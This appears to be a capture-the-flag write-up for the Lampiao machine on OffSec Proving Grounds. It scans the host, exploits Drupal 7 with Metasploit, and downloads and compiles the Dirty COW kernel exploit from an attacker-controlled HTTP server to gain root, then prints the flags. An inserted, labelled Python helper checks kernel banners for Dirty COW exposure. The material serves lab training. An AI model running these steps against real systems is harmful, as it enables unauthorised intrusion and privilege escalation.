
Lampiao

This is my write-up for Lampiao (see original submission) on the OffSec Proving Ground.

This room is a CTF-style room.

I will try to go deep into the technical things we do in this room.


1. Enum

  • Start the machine and get the IP

Machine IP

  • Export the IP to the terminal so we can use it more easily
export IP=192.168.73.48;clear

## Test to see if the IP is correct
echo $IP
  • Start our usual port scans
nmap -sC -sV $IP
rustscan -a $IP

Nmap default scan result
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
| 2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
| 256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_ 256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp open http?
| fingerprint-strings:
| HTTPOptions:
| _____ _ _
| |_|/ ___ ___ __ _ ___ _ _
| \x20| __/ (_| __ \x20|_| |_
| ___/ __| |___/ ___|__,_|___/__, ( )
| |___/
| ______ _ _ _
| ___(_) | | | |
| \x20/ _` | / _ / _` | | | |/ _` | |
|_ __,_|__,_|_| |_|
Rustscan result
PORT     STATE SERVICE     REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
1898/tcp open cymtec-port syn-ack

2. Foothold

  • We got a landing page on port 1898

Landing Page

  • Looks like it is running Drupal, but which version? Let's use nmap to scan this port
nmap -A -p 1898 -sV $IP
---
PORT STATE SERVICE VERSION
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Lampi\xC3\xA3o
|_http-server-header: Apache/2.4.7 (Ubuntu)
  • Looks like the version is Drupal 7. Look for an exploit in msfconsole
msfconsole -q
search drupal 7 exploit
use 1
options
set rhosts 192.168.73.48
set lhost tun0
set rport 1898
run
shell

3. PrivEsc

  • Upgrade the shell with python3
python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm
  • We can upload the pee.sh script to the target machine and run it to look for anything that can help us become root
## On kali machine
python3 -m http.server 88

## On target machine
cd /dev/shm
wget 192.168.49.73:88/pee.sh
chmod +x pee.sh
./pee.sh
pee.sh result
[+] Checking for the kernel of the machine: 
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
searchsploit dirty cow
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Pr | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Es | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Acce | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Acces | linux/local/40611.c
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
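The kernel banner above (4.4.0-31, an Ubuntu 14.04 lts-xenial build from July 2016) is what makes the Dirty COW (CVE-2016-5195) hits from searchsploit relevant. The following is an added triage helper, not part of the original write-up or of pee.sh: it parses a `uname -a` line and reports whether the kernel falls in the affected range. The fixed upstream releases (4.8.3, 4.7.9, 4.4.26) are known values; the first fixed Ubuntu 4.4 ABI number (47) is an assumption taken from the distribution advisory and should be verified against your vendor's advisory.

```python
"""Flag kernels in the Dirty COW (CVE-2016-5195) affected range from a `uname -a` line.
Added triage example for patch verification; the sample banner is the one the write-up shows."""
import re

# Upstream releases that shipped the fix: mainline 4.8.3, stable 4.7.9 and 4.4.26.
# Branches not listed here are treated conservatively as unfixed.
FIXED_UPSTREAM = {(4, 8): 3, (4, 7): 9, (4, 4): 26}
# Ubuntu backports fixes without bumping the upstream version, so for "-NN-generic"
# style kernels the ABI number is what matters. ASSUMPTION: the first fixed Ubuntu 4.4
# ABI is 47 (per the distribution advisory); verify against your vendor's advisory.
FIXED_UBUNTU_ABI = {(4, 4): 47}

# Matches "Linux <host> <major>.<minor>.<patch>[-<abi>-<flavor>]" at the start of uname -a.
KERNEL_RE = re.compile(r"Linux\s+\S+\s+(\d+)\.(\d+)\.(\d+)(?:-(\d+)-\w+)?")

def parse_kernel(uname_line):
    """Return (major, minor, patch, abi_or_None) parsed from a `uname -a` line."""
    m = KERNEL_RE.search(uname_line)
    if not m:
        raise ValueError("not a Linux `uname -a` line")
    major, minor, patch, abi = m.groups()
    return int(major), int(minor), int(patch), (int(abi) if abi else None)

def dirty_cow_exposed(uname_line):
    """True when the kernel is in the affected range and no known fixed build is detected."""
    major, minor, patch, abi = parse_kernel(uname_line)
    if (major, minor, patch) < (2, 6, 22):
        return False                      # bug introduced in 2.6.22
    if (major, minor) >= (4, 9):
        return False                      # fix is in mainline from 4.9 on
    if abi is not None and (major, minor) in FIXED_UBUNTU_ABI:
        return abi < FIXED_UBUNTU_ABI[(major, minor)]   # distro kernel: compare ABI
    fixed_patch = FIXED_UPSTREAM.get((major, minor))
    if fixed_patch is None:
        return True                       # e.g. 4.5/4.6 went EOL without a fix
    return patch < fixed_patch

# Constructed sample: the banner reported by pee.sh on the target.
SAMPLE = ("Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 "
          "01:06:37 UTC 2016 i686 athlon i686 GNU/Linux")

if __name__ == "__main__":
    print(parse_kernel(SAMPLE), "exposed:", dirty_cow_exposed(SAMPLE))
```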
  • Get the cow
## On kali
searchsploit -m linux/local/40847.cpp
mv 40847.cpp cow.cpp
python3 -m http.server 88
---
## On target
cd /dev/shm
wget 192.168.49.73:88/cow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o cow cow.cpp -lutil
./cow -s
  • Get the flags
cat /home/tiago/local.txt /root/proof.txt
bca97901dbf535445a1a114a3242e64d
dedc79c7a9adc646d36984fdb498fde8